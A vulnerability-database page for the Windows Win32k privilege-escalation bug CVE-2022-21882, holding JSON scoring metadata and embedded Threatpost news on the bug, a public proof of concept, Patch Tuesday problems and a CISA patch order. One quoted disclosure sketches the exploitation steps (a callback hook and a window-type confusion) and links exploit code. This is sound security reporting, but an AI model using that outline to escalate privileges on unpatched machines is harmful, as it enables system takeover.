DATABASE RESOURCES PRICING ABOUT US

{"id": "FBC7C8E7-D9E9-50AF-A463-1504B4FC5BE9", "vendorId": null, "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for Improper Privilege Management in Microsoft", "description": "# CVE-2022-21882\n\nWin32k Elevation Of Privileges\n\nTechn...", "published": "2022-02-14T21:28:15", "modified": "2022-03-15T22:03:21", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 7.2}, "severity": "HIGH", "exploitabilityScore": 3.9, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2022-21882", "CVE-2021-1732"], "immutableFields": [], "lastseen": "2022-03-16T00:00:34", "viewCount": 293, "enchantments": {"exploitation": null, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65", "AKB:DFA2540D-E431-4CDE-B67A-7EA3F2B87A74"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0032"]}, {"type": "cisa", "idList": ["CISA:911DE59572B6EF78B42DD868D622F637"]}, {"type": "cve", "idList": ["CVE-2021-1732", "CVE-2022-21882"]}, {"type": "githubexploit", "idList": ["02C6FE13-5036-5BE5-8AC8-278A918BA581", "0885D472-B052-5B6B-A8C9-19FDD33EFF42", "1D0AAF42-5E68-5985-A800-90937D55628D", "5E516DC2-BF71-57D0-9A87-3874146D0F83", "91A5BC48-2410-555B-B7FB-8138577D6B78", "DEAA3BF4-9E7D-55E9-9534-6203A312C46F"]}, {"type": "kaspersky", "idList": ["KLA12071", "KLA12422"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3C358DDA439A247A9677866AFE8FA961"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2022_21882_WIN32K/"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1732", "MS:CVE-2022-21882"]}, {"type": "nessus", "idList": ["SMB_NT_MS22_JAN_5009543.NASL", "SMB_NT_MS22_JAN_5009545.NASL", "SMB_NT_MS22_JAN_5009555.NASL", "SMB_NT_MS22_JAN_5009557.NASL", "SMB_NT_MS22_JAN_5009566.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:166169"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:AD927BF1D1CDE26A3D54D9452C330BB3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:20364300767E58631FFE0D21622E63A3", "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C"]}, {"type": "securelist", "idList": ["SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:A3D3514100806269750A23D748D34C59"]}, {"type": "seebug", "idList": ["SSV:99168"]}, {"type": "thn", "idList": ["THN:0C87C22B19E7073574F7BA69985A07BF", "THN:F163C7AB35BEF8E28924E14B02752181"]}, {"type": "threatpost", "idList": ["THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:FFC3DB875D4337781CF78C0D4B39F0E0"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:C9F6DD38959C2193331C83CA846C0A71"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:C5940EBF622709A929825B8B12592EF5"]}, {"type": "zdt", "idList": ["1337DAY-ID-37433"]}]}, "score": {"value": 1.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65", "AKB:31AEBF63-78A2-4DBE-A691-982C63A64DD0", "AKB:9E1E5A73-8C4D-4A6A-96A5-14A9041AA2CB", "AKB:DFA2540D-E431-4CDE-B67A-7EA3F2B87A74"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "AVLEONOV:D630CE92574B03FCC2E79DCA5007AAFC"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0032", "CPAI-2022-0007"]}, {"type": "cisa", "idList": ["CISA:63CCB4AC4FF75E87DC5BBA1121FC4501", "CISA:911DE59572B6EF78B42DD868D622F637"]}, {"type": "cve", "idList": ["CVE-2021-1698", "CVE-2021-1732", "CVE-2022-21882", "CVE-2022-21887"]}, {"type": "githubexploit", "idList": ["02C6FE13-5036-5BE5-8AC8-278A918BA581", "0885D472-B052-5B6B-A8C9-19FDD33EFF42", "1C45657B-E388-5668-9093-F3934858B728", "1D0AAF42-5E68-5985-A800-90937D55628D", "25DCDCD3-A32C-5B44-B706-FFF9535ECFC2", "453B4EEE-340B-58DA-84D9-277C9D4EFC12", "5E516DC2-BF71-57D0-9A87-3874146D0F83", "7F49BA75-ECD5-5933-8F39-585255092893", "91A5BC48-2410-555B-B7FB-8138577D6B78", "9C08AAB4-D76D-550C-ADA2-175E9AC92E38", "DEAA3BF4-9E7D-55E9-9534-6203A312C46F"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "kaspersky", "idList": ["KLA12071", "KLA12422"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:7BA87FE317071FD5ACDB0EBEBA296F41"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3C358DDA439A247A9677866AFE8FA961", "MALWAREBYTES:6A30A2B661E06D2D7D26479F27BB0EF3"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_21882_WIN32K-"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1698", "MS:CVE-2021-1732", "MS:CVE-2022-21882", "MS:CVE-2022-21887"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_FEB_4601315.NASL", "SMB_NT_MS21_FEB_4601319.NASL", "SMB_NT_MS21_FEB_4601345.NASL", "SMB_NT_MS21_FEB_4601354.NASL", "SMB_NT_MS22_JAN_5009543.NASL", "SMB_NT_MS22_JAN_5009545.NASL", "SMB_NT_MS22_JAN_5009555.NASL", "SMB_NT_MS22_JAN_5009557.NASL", "SMB_NT_MS22_JAN_5009566.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161880", "PACKETSTORM:166169"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:AD927BF1D1CDE26A3D54D9452C330BB3", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:20364300767E58631FFE0D21622E63A3", "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:4BFD931715758C7B7E2711A580BFEA5E", "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C"]}, {"type": "securelist", "idList": ["SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:1F59148E6615695438F94EF4956585AA", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:A10F281EF99381636376D6F6C6501E22", "SECURELIST:A3D3514100806269750A23D748D34C59"]}, {"type": "seebug", "idList": ["SSV:99168"]}, {"type": "thn", "idList": ["THN:012EBB2FE2687F178FBCC3AB8ABEF778", "THN:0C87C22B19E7073574F7BA69985A07BF", "THN:75586AE52D0AAF674F942498C96A2F6A", "THN:A19D66C10E6D6239DFCE7CD41A974F09", "THN:F163C7AB35BEF8E28924E14B02752181"]}, {"type": "threatpost", "idList": ["THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:6067B6D35C99BFCFF226177541A31F69", "THREATPOST:9673D04DAD513AC05EA6440633D75339", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:FFC3DB875D4337781CF78C0D4B39F0E0"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:B5EA1F5E613C3A15D832147CF064EC78", "TRENDMICROBLOG:C9F6DD38959C2193331C83CA846C0A71"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:C5940EBF622709A929825B8B12592EF5"]}, {"type": "zdt", "idList": ["1337DAY-ID-37433"]}]}, "epss": [{"cve": "CVE-2022-21882", "epss": "0.392060000", "percentile": "0.966060000", "modified": "2023-03-18"}, {"cve": "CVE-2021-1732", "epss": "0.003950000", "percentile": "0.692850000", "modified": "2023-03-17"}], "vulnersScore": 1.4}, "_state": {"dependencies": 1659988328, "score": 1659990670, "epss": 1679178262}, "_internal": {"score_hash": "dac74022f7feaa6635fbe7c68b6febce"}, "privateArea": 1}

{"threatpost": [{"lastseen": "2022-02-10T00:00:00", "description": "Security teams might have skipped January\u2019s Patch Tuesday after reports of it breaking servers, but it also included a patch for a privilege-escalation bug in Windows 10 that leaves unpatched systems open to malicious actors looking for administrative access. It\u2019s a bug that now has a proof-of-concept exploit [available in the wild](<https://github.com/gdabah/win32k-bugs/blob/master/console.cpp>).\n\nThe exploit was released by Gil Dabah, founder and CEO of Privacy Piiano, who tweeted that he decided not to report the bug two years ago after finding it difficult to get paid on other bug bounties through the Microsoft program.\n\n> Found it two years ago. Not recently. That\u2019s the point. <https://t.co/PtRuNDAEYQ>\n> \n> \u2014 Gil Dabah (@_arkon) [January 26, 2022](<https://twitter.com/_arkon/status/1486449470741135362?ref_src=twsrc%5Etfw>)\n\n## **The LPE Bug **\n\n\u201cA local, authenticated attacker could gain elevated local system or [administrator privileges](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) through a vulnerability in the Win32k.sys driver,\u201d Microsoft explained in it\u2019s advisory, part of [January\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-wormable-critical-rce-bug-zero-day/177564/>).\n\nThe [disclosure for CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-21882.html>) from RyeLv, who is attributed with the find, was published on Jan. 13 and described the [win32k object type confusion](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) vulnerability.\n\n\u201cThe attacker can call the relevant GUI API at the user_mode to make the kernel call like xxxMenuWindowProc, xxxSBWndProc, xxxSwitchWndProc, xxxTooltipWndProc, etc.,\u201d the disclosure by RyeLV said.\n\n\u201cThese kernel functions will trigger a callback xxxClientAllocWindowClassExtraBytes. Attacker can intercept this callback through hook xxxClientAllocWindowClassExtraBytes in KernelCallbackTable,and use the NtUserConsoleControl method to set the ConsoleWindow flag of the tagWND object, which will modify the window type.\u201d\n\nThe bug was being exploited by sophisticated groups as a zero-day issue, Microsoft said.\n\n> Regarding the just-fixed CVE-2022-21882: \nwin32k privilege escalation vulnerability, \nCVE-2021-1732 patch bypass,easy to exploit,which was used by apt attacks\n> \n> \u2014 b2ahex (@b2ahex) [January 12, 2022](<https://twitter.com/b2ahex/status/1481233350840893442?ref_src=twsrc%5Etfw>)\n\n## **Microsoft Needs to Up It\u2019s Bug Bounty Game? **\n\nJanuary\u2019s Patch Tuesday was plagued by [Windows server update issues](<https://threatpost.com/microsoft-yanks-buggy-windows-server-updates/177648/>) that could have understandably made internal security teams pause before downloading the patches. But a PoC is now available for the bug, putting exploitation in reach of cybercriminals of all levels of expertise.\n\nDabah said that Microsoft\u2019s bug-bounty program was problematic.\n\n> The reason I didn\u2019t disclose it, was because I waited to get paid by Msft for long time for other stuff. By the time they paid they reduced awards to nothing almost. I was already busy with my startup and that\u2019s the story how it went unfixed. [@ja_wreck](<https://twitter.com/ja_wreck?ref_src=twsrc%5Etfw>) <https://t.co/PtRuNDAEYQ>\n> \n> \u2014 Gil Dabah (@_arkon) [January 28, 2022](<https://twitter.com/_arkon/status/1487005745023537157?ref_src=twsrc%5Etfw>)\n\nInvesting in the program was the primary recommendation in RyeLv\u2019s technical analysis to Microsoft.\n\nHe noted how to \u201ckill the bug class\u201d: \u201cImprove the kernel zero-day bounty, let more security researchers participate in the bounty program, and help the system to be more perfect.\u201d\n\nIt should be noted that Microsoft has been willing to throw additional funding at [bug-bounty programs](<https://threatpost.com/microsoft-30k-teams-bugs/165037/>) for other high-profile products, including last spring\u2019s announcement the company would pay up to $30,000 for Teams bugs.\n\nThe computing giant did not immediately return a request for comment.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-31T21:59:35", "type": "threatpost", "title": "Public Exploit Released for Windows 10 Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-01-31T21:59:35", "id": "THREATPOST:9673D04DAD513AC05EA6440633D75339", "href": "https://threatpost.com/public-exploit-windows-10-bug/178135/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-16T18:53:24", "description": "Microsoft has removed a faulty servicing stack update, which was causing issues for Windows users when they tried to install last week\u2019s [Patch Tuesday security updates](<https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/>).\n\nMicrosoft\u2019s [servicing stack update](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) provides fixes for the component that installs Windows updates. This particular defective update ([KB4601392](<https://support.microsoft.com/en-us/topic/kb5001078-servicing-stack-update-for-windows-10-version-1607-february-12-2021-3e19bfd1-7711-48a8-978b-ce3620ec6362>)) applied to Windows 10 users (version 1607 for 32-bit and x64-based systems) and Windows Server 2016 users.\n\nTo address this issue, Microsoft has removed the faulty update and released a new one ([KB5001078](<https://support.microsoft.com/en-us/topic/kb5001078-servicing-stack-update-for-windows-10-version-1607-february-12-2021-3e19bfd1-7711-48a8-978b-ce3620ec6362>)).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThere is a known issue that halts the installation progress of the February 9, 2021 security update,\u201d said Microsoft on Friday.\n\n## **Microsoft Faulty Update: A Windows Security Issue **\n\nMicrosoft said that the erroneous servicing-stack update (KB4601392) froze installations for the \u201cCumulative Update\u201d from the recent Windows Update. This resulted in the installation for the update halting at 24 percent.\n\nWindows users \u2013 who [reported issues](<https://www.askwoody.com/tag/kb5001078/>) \u2013 must install this new servicing stack update before installing the its recent February Patch Tuesday security update from last week.\n\n\u201cYou must install the new servicing-stack update (SSU) [KB5001078 ](<https://support.microsoft.com/en-us/topic/kb5001078-servicing-stack-update-for-windows-10-version-1607-february-12-2021-3e19bfd1-7711-48a8-978b-ce3620ec6362>)before installing this cumulative update (LCU),\u201d according to Microsoft. \u201cSSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes.\u201d\n\n## **How Windows Users Can Mitigate if They Already Installed KB4601392**\n\nMicrosoft gave the follow mitigation advice for devices that have already installed KB4601392:\n\n * Users should restart their devices and then follow only steps 1, 2 and 4a from [Reset Windows Update components manually.](<https://docs.microsoft.com/en-us/windows/deployment/update/windows-update-resources#reset-windows-update-components-manually>)\n * They should then restart their devices again.\n * [KB5001078](<https://support.microsoft.com/help/5001078>) should now install from Windows Update when users select \u201ccheck for updates\u201d \u2013 or they can wait for it to install automatically.\n * Users should then be able to install the latest Cumulative Update from Windows Update.\n\nFor Windows users who haven\u2019t applied the previous update, the new update \u201cis available through Windows Update,\u201d said Microsoft. \u201cIt will be downloaded and installed automatically.\u201d\n\nTo get the stand-alone package for the update, users can also go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5001078>) website said Microsoft.\n\n## **Patch Tuesday Security Updates: Apply Now **\n\nMicrosoft\u2019s February Patch Tuesday from last week addressed nine critical-severity cybersecurity bugs, plus an important-rated vulnerability that is being actively exploited in the wild.\n\nThe bug tracked as [CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>),** **is being actively exploited, according to Microsoft\u2019s advisory. This underscores the need for sysadmins to quickly apply the update. This is why the faulty servicing-stack update creating an obstacle for deploying Patch Tuesday updates is an issue for companies.\n\n\u201cThe exploitation of this vulnerability would allow an attacker to execute code in the context of the kernel and gain SYSTEM privileges, essentially giving the attacker free rein to do whatever they wanted with the compromised machine,\u201d said Chris Hass, director of Information Security and Research at Automox, in an email.\n\n\u201cBecause this vulnerability is already being used by attackers, patching this vulnerability is as soon as possible is absolutely crucial,\u201d said Hass.\n\n### _Is your small- to medium-sized business an easy mark for attackers?_\n\n**Threatpost WEBINAR:** _ Save your spot for __\u201c_**15 Cybersecurity Gaffes SMBs Make**_,\u201d a _[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)** _on Feb. 24 at 2 p.m. ET._**_ Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. _[_Register NOW_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)_ for this _**_LIVE_****_ _**_webinar on Wed., Feb. 24._\n", "cvss3": {}, "published": "2021-02-16T16:47:36", "type": "threatpost", "title": "Microsoft Pulls Bad Windows Update After Patch Issue", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1732"], "modified": "2021-02-16T16:47:36", "id": "THREATPOST:FFC3DB875D4337781CF78C0D4B39F0E0", "href": "https://threatpost.com/microsoft-windows-update-patch-tuesday/163981/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-02-10T00:00:00", "description": "CISA is putting the thumbscrews on federal agencies to get them to patch an actively exploited Windows vulnerability.\n\nOn Friday, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) [announced](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/04/cisa-adds-one-known-exploited-vulnerability-catalog>) that it added the vulnerability \u2013 tracked as [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) and with a CVSS criticality rating of 7.0 \u2013 to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\nThe move means that Federal Civilian Executive Branch (FCEB) agencies have until Feb. 18, 2022 to remediate the vulnerability, which [affects](<https://threatpost.com/public-exploit-windows-10-bug/178135/>) all unpatched versions of Windows 10.\n\n\u201cThese types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise,\u201d CISA said.\n\n## Exploitation Likely\n\nCVE-2022-21882 is a privilege-escalation bug in Windows 10 that doesn\u2019t require much in the way of privileges to exploit: a nasty scenario, particularly given that an exploit requires zero user interaction.\n\nIt\u2019s been tagged with an \u201cExploitation More Likely\u201d exploitability index assessment.\n\nMicrosoft [addressed](<https://threatpost.com/microsoft-wormable-critical-rce-bug-zero-day/177564/>) the bug as part of its January 2022 Patch Tuesday updates: a sprawling set of patches that dealt with 97 security vulnerabilities, of which nine were critical CVEs, including a self-propagator with a 9.8 CVSS score.\n\n## January\u2019s Exploding Patch Tuesday\n\nUnfortunately, despite the fact that it was a fat Patch Tuesday stuffed full of critical patches, it was also a fat Patch Tuesday to which many organizations likely developed an allergic reaction.\n\nThat\u2019s because, at least for some customers, the updates blew up immediately, breaking Windows, causing spontaneous boot loops on Windows domain controller servers, breaking Hyper-V and making ReFS volume systems unavailable.\n\nWithin two days of the Jan. 11 release, Microsoft had [yanked](<https://threatpost.com/microsoft-yanks-buggy-windows-server-updates/177648/>) the January Windows Server cumulative updates, rendering them unavailable via Windows Update.\n\n## PoC Has Been Out for Weeks\n\nA proof-of-concept (PoC) exploit for CVE-2022-21882, which Microsoft had addressed as part of those January 2022 Patch Tuesday updates, has been [available in the wild](<https://github.com/gdabah/win32k-bugs/blob/master/console.cpp>) for a few weeks. The PoC was released by Gil Dabah, founder and CEO of Privacy Piiano, which offers \u201cPII by design.\u201d\n\nAs Dabah [tweeted](<https://twitter.com/_arkon/status/1487005745023537157>) on Jan. 28, he found the bug two years ago but decided not to report it at the time, given that Microsoft still owed him money for \u201cother stuff,\u201d as he claimed. Besides which, he wasn\u2019t happy about Microsoft\u2019s shrinking bug bounty awards, which \u201creduced awards to nothing almost,\u201d Dabah said.\n\n> The reason I didn\u2019t disclose it, was because I waited to get paid by Msft for long time for other stuff. By the time they paid they reduced awards to nothing almost. I was already busy with my startup and that\u2019s the story how it went unfixed. [@ja_wreck](<https://twitter.com/ja_wreck?ref_src=twsrc%5Etfw>) <https://t.co/PtRuNDAEYQ>\n> \n> \u2014 Gil Dabah (@_arkon) [January 28, 2022](<https://twitter.com/_arkon/status/1487005745023537157?ref_src=twsrc%5Etfw>)\n\nOn Friday, CISA said that it added the bug to the known exploited [vulnerability database](<https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/>) based on evidence that threat actors are actively exploiting it. Although CISA\u2019s fix-it deadline only applies to FCEB agencies, CISA\u2019s got sway, and It\u2019s hoping to use it to convince non-federal outfits to patch.\n\n\u201cCISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of[ Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice,\u201d according to its notice.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T22:39:28", "type": "threatpost", "title": "CISA Orders Federal Agencies to Fix Actively Exploited Windows Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-21882"], "modified": "2022-02-07T22:39:28", "id": "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "href": "https://threatpost.com/cisa-orders-federal-agencies-to-fix-actively-exploited-windows-bug/178270/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-09T08:01:14", "description": "Oh, blessed day: Microsoft\u2019s Patch Tuesday is a featherweight in comparison to some of its not-atypical, 10-ton security updates, with just 51 patches \u2014 none of them rated critical.\n\nFor February, Microsoft\u2019s [releases](<https://msrc.microsoft.com/update-guide/>) address CVEs in Windows and Windows Components, Azure Data Explorer, Kestrel Web Server, Microsoft Edge (Chromium-based), Windows Codecs Library, Microsoft Dynamics, Microsoft Dynamics GP, Microsoft Office and Office Components, Windows Hyper-V Server, SQL Server, Visual Studio Code and Microsoft Teams.\n\nAmong these, Microsoft addressed one zero-day: [CVE-2022-21989](<http://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21989>), a Windows Kernel elevation-of-privilege vulnerability. And, one of the updates is for a CVE first published in 2013.\n\nThis crop is in addition to the 19 CVEs patched by Microsoft Edge (Chromium-based) earlier this month, which brings the February total to 70 CVEs.\n\n## Whaaa? No Critical CVEs?!\n\nOf course, it\u2019s not size that matters. But February\u2019s patch-a-palooza is light not just in number of CVEs, but also in that it comes with nary a single patch that\u2019s labeled critical.\n\nHas that ever happened?\n\nAs of Monday afternoon, Dustin Childs, a researcher with Trend Micro\u2019s Zero Day Initiative (ZDI) Zero Day Initiative (ZDI), was scratching his head on that one.\n\n\u201cIt may have happened before, but I can\u2019t find an example of a monthly release from Microsoft that doesn\u2019t include at least one critical-rated patch,\u201d Childs wrote in ZDI\u2019s Patch Tuesday [analysis](<https://www.zerodayinitiative.com/blog/2022/2/8/the-february-2022-security-update-review>). \u201cIt certainly hasn\u2019t happened in recent memory.\u201d\n\nChilds noted that this February\u2019s volume \u201cis in line with February releases from previous years, which (apart from 2020) tend to be around 50 CVEs.\u201d\n\nIt follows the big batch that Microsoft [baked](<https://threatpost.com/microsoft-wormable-critical-rce-bug-zero-day/177564/>) for its January 2022 Patch Tuesday, when it addressed a total of 97 security vulnerabilities, including nine critical CVEs \u2013 one of which is a self-propagator with a 9.8 CVSS score, and six of which were listed as publicly known zero-days.\n\nTo add indigestion to overwork, the January patches immediately [blew up](<https://threatpost.com/microsoft-yanks-buggy-windows-server-updates/177648/>). Since their release on Jan. 11, the updates started breaking Windows, causing spontaneous boot loops on Windows domain controller servers, breaking Hyper-V and making ReFS volume systems unavailable.\n\n\u201cUnfortunate that the Jan 11 updates have a number of serious flaws that mean they are un-deployable,\u201d lamented one Threatpost reader. \u201cThat means our servers are unpatched and vulnerable to other security risks due to other bugs, until the next set of patches come out.\u201d\n\nOf the patches released today \u2013 that awaited \u201cnext set of patches\u201d \u2014 50 are rated important and one is rated moderate in severity.\n\n## No Active Exploits (Yet)\n\nMicrosoft listed none of the February bugs as being under exploit, though one is listed as publicly known as the time of release. But as ZDI\u2019s Childs pointed out, the same was true of last month\u2019s release \u2013 for two days, at any rate, after which the company revised [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21882>) to indicate that \u201cMicrosoft was aware of limited, targeted attacks that attempt to exploit this vulnerability.\u201d\n\nIf Microsoft learns otherwise, or changes its corporate mind, Childs promised that ZDI will update its analysis.\n\nAs for the zero-day elevation of privilege vulnerability in the Windows Kernel, Satnam Narang, staff research engineer at Tenable, noted via email: \u201cWhile Microsoft rates the vulnerability as \u2018exploitation more likely,\u2019 the complexity to exploit the vulnerability is high, because of the added legwork required to prepare the target.\u201d\n\nHe added, \u201cThis type of vulnerability is often leveraged by an attacker once they\u2019ve already compromised the target, either through the use of a separate vulnerability or malware.\u201d\n\n## Full List of CVEs\n\nAs it does, ZDI has put up the full list of CVEs released by Microsoft for this month.\n\nChilds also delved into four of the more interesting bugs. Here\u2019s what he had to say:\n\n * * [CVE-2022-21984](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21984>) \u2013 **Windows DNS Server Remote Code Execution Vulnerability:** This patch fixes a remote code-execution bug in the Microsoft DNS server. The server is only affected if dynamic updates are enabled, but this is a relatively common configuration. If you have this setup in your environment, an attacker could completely take over your DNS and execute code with elevated privileges. Since dynamic updates aren\u2019t enabled by default, this doesn\u2019t get a critical rating. However, if your DNS servers do use dynamic updates, you should treat this bug as critical.\n * [CVE-2022-23280](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23280>) \u2013 **Microsoft Outlook for Mac Security Feature Bypass Vulnerability:** \u201cThis Outlook bug could allow images to appear in the Preview Pane automatically, even if this option is disabled. On its own, exploiting this will only expose the target\u2019s IP information. However, it\u2019s possible a second bug affecting image rendering could be paired with this bug to allow remote code execution. If you are using Outlook for Mac, you should double-check to ensure your version has been updated to an unaffected version.\u201d\n * 